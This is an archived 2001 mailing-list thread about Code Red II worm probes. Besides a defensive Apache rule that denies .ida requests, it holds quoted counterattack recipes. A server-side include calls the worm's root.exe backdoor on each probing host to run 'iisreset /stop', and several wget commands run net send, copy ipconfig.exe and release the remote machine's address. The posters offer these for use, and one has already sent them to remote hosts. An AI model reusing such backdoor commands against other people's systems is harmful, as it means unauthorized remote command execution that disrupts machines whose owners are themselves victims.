[NTLUG:Discuss] @home, Carrollton TX hits on port 80

asenec@senechalle.net asenec at senechalle.net
Sat Aug 11 15:43:04 CDT 2001 

We have about 500 servers, many of which were becoming nonresponsive
due to the CR2 probes.  Adding this to httpd.conf file on those
servers running Apache 1.3 or greater worked wonders:  Apache now know
exactly what to do in response to such a request.


<Files *.ida>
order allow,deny
deny from all
</Files>



Annette

> From discuss-admin at ntlug.org Sat Aug 11 09:23 CDT 2001
> From: "Jack Snodgrass" <idiotboy at cybermail.net>
> To: <discuss at ntlug.org>
> Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
> MIME-Version: 1.0
> Content-Transfer-Encoding: 7bit
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300
> X-BeenThere: discuss at ntlug.org
> X-Mailman-Version: 2.0.3
> List-Help: <mailto:discuss-request at ntlug.org?subject=help>
> List-Post: <mailto:discuss at ntlug.org>
> List-Subscribe: <http://www.ntlug.org/mailman/listinfo/discuss>,
> 	<mailto:discuss-request at ntlug.org?subject=subscribe>
> List-Id: NTLUG Discussion List <discuss.ntlug.org>
> List-Unsubscribe: <http://www.ntlug.org/mailman/listinfo/discuss>,
> 	<mailto:discuss-request at ntlug.org?subject=unsubscribe>
> List-Archive: <http://www.ntlug.org/pipermail/discuss/>
> Date: Sat, 11 Aug 2001 09:21:06 -0500
> 
> I don't think that this will work.
> 
> I tried, it but lynx called from apache has problems.
> It complains that there is no terminal associated with the lynx process.
> 
> I'm using wget -o /dev/null now instead. It might work... but might not.
> 
> I tried to access several servers that tried to infect my server but they
> were all busy. None of them were accepting connections. In order for this
> to work, they would have to accept the connection and run the root.exe.
> 
> I also used:
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Machine+%25COMPUTERNAME%25+has+been+infected+by+the+Code+
> Red+II+worm+and+attacked+my+server"
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Please+see+http://www.cert.org/advisories/CA-2001-23.html+
> and+fix+this+server+ASAP."
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+explorer+http://www.myservername.net/code_red_worm.html"
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+copy+c:\winnt\system32\ipconfig.exe+."
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/ipconfig.exe?+
> /release"
> 
> ( I added the line breaks ) and so far, no boxes have tried to access
> my
> http://www.myservername.net/code_red_worm.html
> page. Either I'm doing something wrong... or I think.... the servers
> just don't respond to the messages now.
> 
> I guess I could try and run this later when they are less busy infecting
> other machines.
> 
> 
> jack
> 
> 
> 
> ----- Original Message -----
> From: "Michael Collins" <mhtexcollins at austin.rr.com>
> To: <discuss at ntlug.org>
> Sent: Friday, August 10, 2001 9:20 PM
> Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
> 
> 
> > Saw this on alt.os.linux.slackware...thought you guys might be interested.
> >
> > Open httpd.conf and add:
> > AddType text/html .ida
> > AddHandler server-parsed .ida
> >
> > Restart apache with
> > /var/lib/apache/sbin/apachectl restart
> >
> > Create the file /var/lib/apache/htdocs/default.ida with the following
> > line:
> > <!--#exec cmd="lynx -source
> > http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
> >
> > Then sit back and watch the bastard machines shut themselves down.
> >
> > Note: This will not work on the original Code Red. That's the one that
> > displays a string of "N" characters instead of "X" characters.
> >
> >
> >
> >
> >
> >
> >
> > J. Jentink wrote:
> > > I am getting about 20 hits an hour right now over my @home cable in
> > > Carrollton.
> > >>From my web log, the following are the last few hitters: IP and
> > > reverse DNS lookup
> > >   24.0.40.151 cx1221131-b.elcjn1.sdca.home.com
> > >   24.0.164.239 cx586708-a.fed1.sdca.home.com
> > >   24.0.218.136 cx59931-a.dnpt1.occa.home.com
> > >   24.0.162.42 cx487547-a.fed1.sdca.home.com
> > >   24.0.154.161 cx112244-c.cv1.sdca.home.com
> > >   24.0.162.42 cx487547-a.fed1.sdca.home.com
> > >   24.0.212.47 cx47296-a.alsv1.occa.home.com
> > >   24.0.147.21 cx512128-c.dt1.sdca.home.com
> > >   24.0.235.235 c1517939-b.frndl1.wa.home.com
> > >   24.0.49.245 c75556-f.potlnd1.or.home.com
> > >
> > > When I did the reverse DNS on my own IP, it maps to the form..
> > >     c*******-a.croltn1.tx.home.com
> > > Looks like I an getting hammered by the @home folks on the west
> > > coast... California, Washington and Oregon.
> > >
> > > My RD light on the cable modem also blinks constantly. I just
> > > disconnect it when I am not using the internet. What fun.
> > >
> > > j.
> > >
> > >
> > >
> > > _______________________________________________
> > > http://www.ntlug.org/mailman/listinfo/discuss
> > >
> > >
> >
> >
> >
> > --
> > --
> > Michael H. Collins              Admiral: Penguinista Navy International
> > http://www.linuxlink.com        Migration
> > Free Linux Email                http://www.78704.com
> > A great geek girl mp3           http://24.28.86.53
> > This Ain't California http://geekaustin.com/
> >
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >
> 
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>

More information about the Discuss mailing list